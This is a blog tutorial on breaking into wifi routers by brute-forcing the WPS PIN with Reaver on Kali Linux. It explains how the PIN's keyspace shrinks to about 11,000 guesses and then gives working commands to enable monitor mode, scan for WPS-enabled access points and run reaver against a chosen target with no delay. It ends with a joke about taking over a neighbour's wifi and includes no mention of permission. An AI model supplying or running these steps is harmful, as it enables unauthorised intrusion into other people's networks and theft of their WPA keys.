Reaver-wps targets the external registrar functionality mandated by the WiFi Protected Setup specification. Access points will provide authenticated registrars with their current wireless configuration (including the WPA PSK), and also accept a new configuration from the registrar. In order to authenticate as a registrar, the registrar must prove its knowledge of the AP’s 8-digit pin number. Registrars may authenticate themselves to an AP at any time without any user interaction. Because the WPS protocol is conducted over EAP, the registrar need only be associated with the AP and does not need any prior knowledge of the wireless encryption or configuration. Reaver-wps performs a brute force attack against the AP, attempting every possible combination in order to guess the AP’s 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values. The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum. Reaver-wps brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts. The speed at which Reaver can test pin numbers is entirely limited by the speed at which the AP can process WPS requests. Some APs are fast enough that one pin can be tested every second; others are slower and only allow one pin every ten seconds. Statistically, it will only take half of that time in order to guess the correct pin number.

source :



Fire up kali linux and get a wifi adapter alpha or tp-link, both works fine.


Buy now



The important part is installing the driver. If you dont know the firmware or model number connect the adapter to kali and open terminal and type :

# lsusb

It will show all the connected devices with their model number. Download the right driver and install it. check whether its working or not :

# iwconfig
If its working it will show up the wireless extension configurations.
By default Reaver is pre installed. If you dont find it, just install it:
# apt-get install reaver



You have to enable monitor mode follow the commands :
# airmon-ng check kill
# airmon-ng start wlan0
In kali 2.0 monitor mode is enabled on “wlan0mon” and not on mon0.
Then scan for the devices.
# airodump-ng wlan0mon

All available APs in your area will show up. Pic our target (wps enabled) and copy the mac adress


Reaver Usage

lets begin the attack! the following command is basic command and gives more verbose output while its attacking the router.
# reaver -i wlan0mon -b “mac address” -vv
Normally almost all the router’s password will be cracked within 10 min or so because most probably the default pin will be unchanged. If the pin is changed by the user or if its has a complicated pin reaver will not take more than 3 Hours. The conclusion is that Reaver can take down any router even if the password is 64 chatacter complicated one because the wps pin cannot be more than 8 digit.


Advanced options

> Fixed channel and AP SSID
# reaver -i wlan0mon -b “mac address” -c “channel” -e “ssid” -vv
> The default delay period between pin attempts is 1 second. Change this to zero for no delay.
# reaver -i mon0 -b “mac address” -d 0
hastalavista neighbor’s wifi 🙂

Susmith Krishnan

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.